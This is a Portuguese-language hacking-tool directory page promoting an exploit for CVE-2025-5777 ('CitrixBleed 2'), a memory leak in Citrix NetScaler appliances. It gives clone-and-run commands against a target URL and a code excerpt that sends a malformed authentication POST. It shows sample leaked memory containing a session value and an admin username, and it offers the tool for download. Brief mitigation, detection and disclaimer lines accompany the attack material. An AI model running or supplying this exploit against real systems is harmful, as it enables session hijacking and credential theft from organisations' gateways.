Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-5777 — CVE-2025-5777 Exploit de Vazamento de Memória do Citrix NetScaler (CitrixBleed 2) | Kitploit
Ferramentas/GitHubGitHub/bughuntar/cve-2025-5777
Forensia de MemóriaAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de Penetração
GitHubbughuntar/cve-2025-5777

CVE-2025-5777

CVE-2025-5777 Exploit de Vazamento de Memória do Citrix NetScaler (CitrixBleed 2)

Ver Repositório
307há 1 anoRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-5777 - Exploração de Vazamento de Memória no Citrix NetScaler

Banner


📌 Visão Geral

Esta ferramenta demonstra a CVE-2025-5777, uma vulnerabilidade crítica de divulgação de memória em dispositivos Citrix NetScaler ADC/Gateway. A exploração vaza conteúdos sensíveis da memória através de solicitações de autenticação malformadas.

Principais Funcionalidades:
✔ Detecção de vazamento de memória através da análise de respostas XML
✔ Despejo Hex+ASCII das regiões de memória vazadas
✔ Formato de requisição compatível com Burp Suite
✔ Requisições assíncronas para testes eficientes


🔍 Prova de Conceito

1. Requisição Vulnerável (Burp Suite)

Burp Request

2. Exploração em Ação

Tool Execution


⚡ Início Rápido

root@kitploit:~
git clone https://github.com/bughuntar/CVE-2025-5777.git
cd CVE-2025-5777
pip install requests beautifulsoup4 aiohttp colorama
chmod +x citrix_memory_leak.py
python3 citrix_memory_leak.py https://target-netscaler.com

Saída Esperada:

root@kitploit:~
+ [+] Memory leak detected!
--- Leaked Memory Hex Dump ---
00000000  73 65 73 73 69 6F 6E 3D 31 32 33 34 35 36 37 38  session=12345678
00000010  55 73 65 72 3A 20 61 64 6D 69 6E 00 00 00 00 00  User: admin.....

🛡️ Mitigação

AçãoComando/Referência
CorreçãoBoletim de Segurança da Citrix
Regra WAFBlock POST /p/u/doAuthentication.do with malformed params

📚 Recursos

  • Entrada NVD
  • Artigo Técnico

🖥️ Destaques do Código

root@kitploit:~
# Malformed request trigger
async def exploit(target):
    async with aiohttp.post(
        f"{target}/p/u/doAuthentication.do",
        data="login",  # Missing equals sign triggers leak
        ssl=False
    ) as response:
        await parse_leak(await response.read())

⚠️ Aviso Legal

root@kitploit:~
- This tool is for authorized testing ONLY.
- Unauthorized use violates international cybersecurity laws.

Aviso completo: DISCLAIMER.md

Autor: Professor the Hunter

Baixar ferramenta
Detecçãogrep 'POST /p/u/doAuthentication.do' netscaler.log